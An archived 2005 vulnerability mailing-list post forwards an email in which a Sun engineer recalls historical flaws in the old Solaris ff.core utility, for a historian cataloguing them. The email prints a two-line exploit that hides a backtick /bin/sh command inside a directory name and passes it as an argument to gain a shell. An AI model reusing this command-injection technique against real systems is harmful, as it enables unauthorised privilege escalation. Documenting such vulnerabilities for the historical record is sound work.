[VIM] Re: old Solaris ff.core help =) (fwd)
security curmudgeon
jericho at attrition.org
Tue Jun 14 19:13:01 EDT 2005
---------- Forwarded message ----------
From: Casper.Dik at Sun.COM
To: security curmudgeon <jericho at attrition.org>
Cc: Steven Christey <coley at mitre.org>
Date: Wed, 08 Jun 2005 09:48:12 +0200
Subject: Re: old Solaris ff.core help =)
>this post:
>
>http://archives.neohapsis.com/archives/bugtraq/1995_1/0003.html
>
>This is one of a few mentions of "two vulnerabilities in ff.core". Based
>on the date, the Aug 30, 1994 IFS would be one of the two, but I can't
>find record of the second beyond the somewhat cryptic 101889 patch notes
>and several mail list posts.
>
>In short, can you confirm there were two vulnerabilities around 1994/1995
>in ff.core? If so, any hint as to what the second was, or the impact?
>Given the age of the program, I don't think it is letting any serious
>cat out of the bag =) This is purely for a historic perspective on
>vulnerabilities.
ff.core was a mess and there were certainly several vulnerabilities
in it; I corresponded a lot about this with Sun and then made sure it was
mostly fixed after I joined Sun.
It used popen/system a lot and allowed you to chown tandom
files.
My old favourite exploit (which I had memorized and could type by hand)
after the initial (botched ) fix was:
mkdir -p '/tmp/rdiskette0/`/bin/sh</dev/tty>/dev/tty 2>&1`'
ff.core 0 1 '/tmp/rdiskette0/`/bin/sh</dev/tty>/dev/tty 2>&1`' x
There were some symlink issues and there was the ability to rename
random files.
Casper
More information about the VIM
mailing list